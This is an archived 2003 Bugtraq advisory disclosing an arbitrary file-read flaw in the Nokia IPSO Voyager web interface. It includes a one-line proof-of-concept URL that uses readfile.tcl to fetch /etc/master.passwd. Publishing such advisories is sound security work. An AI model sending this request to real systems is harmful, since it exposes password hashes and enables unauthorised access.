[29875] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Nokia IPSO Vulnerability

daemon@ATHENA.MIT.EDU (Jonas Eriksson)
Thu Apr 24 13:45:07 2003

Date: Wed, 23 Apr 2003 20:27:20 +0200 (CEST)
From: Jonas Eriksson <je@sekure.net>
To: bugtraq@securityfocus.com
Message-ID: <Pine.BSO.4.44.0304232020150.13010-100000@birdie.sekure.net>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

There is a remote security vulnerability in the Nokia IPSO operating
system.

Anyone with access to the webgui (Voyager) on the Nokia IP-box
can read any file on the system.

For example, login as the user 'monitor' (disabled by default)
and use the readfile.tcl to read any file:

http://x.x.x.x/cgi-bin/readfile.tcl?file=/etc/master.passwd

Tested on IPSO 3.6-FCS6

Regards,
Jonas Eriksson
http://sekure.net


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[29875] in bugtraq

Nokia IPSO Vulnerability

daemon@ATHENA.MIT.EDU (Jonas Eriksson)Thu Apr 24 13:45:07 2003

daemon@ATHENA.MIT.EDU (Jonas Eriksson)
Thu Apr 24 13:45:07 2003